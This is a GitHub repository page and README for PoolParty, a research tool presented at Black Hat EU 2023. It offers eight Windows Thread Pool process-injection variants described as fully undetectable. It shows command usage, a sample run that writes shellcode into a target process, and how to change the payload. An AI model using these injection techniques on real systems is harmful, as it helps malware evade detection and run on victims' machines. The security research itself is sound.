https://github.com/safebreach-labs/poolparty
A set of fully-undetectable process injection techniques abusing Windows Thread Pools
- Host: GitHub
- URL: https://github.com/safebreach-labs/poolparty
- Owner: SafeBreach-Labs
- License: bsd-3-clause
- Created: 2023-05-21T16:13:32.000Z (almost 2 years ago)
- Default Branch: main
- Last Pushed: 2023-12-11T10:52:05.000Z (over 1 year ago)
- Last Synced: 2025-04-03T09:11:09.579Z (24 days ago)
- Language: C++
- Homepage:
- Size: 84 KB
- Stars: 1,080
- Watchers: 17
- Forks: 143
- Open Issues: 1
Metadata Files:
- Readme: README.md
- License: LICENSE
README
# PoolParty
A collection of fully-undetectable process injection techniques abusing Windows Thread Pools. Presented at Black Hat EU 2023 Briefings under the title - [**The Pool Party You Will Never Forget: New Process Injection Techniques Using Windows Thread Pools**](https://www.blackhat.com/eu-23/briefings/schedule/#the-pool-party-you-will-never-forget-new-process-injection-techniques-using-windows-thread-pools-35446)

## PoolParty Variants
| Variant ID | Variant Description |
| ------------- | ----------------- |
| 1 | Overwrite the start routine of the target worker factory |
| 2 | Insert TP_WORK work item to the target process's thread pool |
| 3 | Insert TP_WAIT work item to the target process's thread pool |
| 4 | Insert TP_IO work item to the target process's thread pool |
| 5 | Insert TP_ALPC work item to the target process's thread pool |
| 6 | Insert TP_JOB work item to the target process's thread pool |
| 7 | Insert TP_DIRECT work item to the target process's thread pool |
| 8 | Insert TP_TIMER work item to the target process's thread pool |

## Usage
```
PoolParty.exe -V <VARIANT_ID> -P <PID>
```

## Usage Examples
Insert TP_TIMER work item to process ID 1234
```
>> PoolParty.exe -V 8 -P 1234
[info] Starting PoolParty attack against process id: 1234
[info] Retrieved handle to the target process: 00000000000000B8
[info] Hijacked worker factory handle from the target process: 0000000000000058
[info] Hijacked timer queue handle from the target process: 0000000000000054
[info] Allocated shellcode memory in the target process: 00000281DBEF0000
[info] Written shellcode to the target process
[info] Retrieved target worker factory basic information
[info] Created TP_TIMER structure associated with the shellcode
[info] Allocated TP_TIMER memory in the target process: 00000281DBF00000
[info] Written the specially crafted TP_TIMER structure to the target process
[info] Modified the target process's TP_POOL tiemr queue list entry to point to the specially crafted TP_TIMER
[info] Set the timer queue to expire to trigger the dequeueing TppTimerQueueExpiration
[info] PoolParty attack completed successfully
```
## Default Shellcode and Customization
The default shellcode spawns a calculator via the [WinExec API](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec). To customize the executable that gets launched, change the path at the end of the `g_Shellcode` variable in the main.cpp file.
## Author - Alon Leviev
* LinkedIn - [Alon Leviev](https://il.linkedin.com/in/alonleviev)
* Twitter - [@_0xDeku](https://twitter.com/_0xDeku)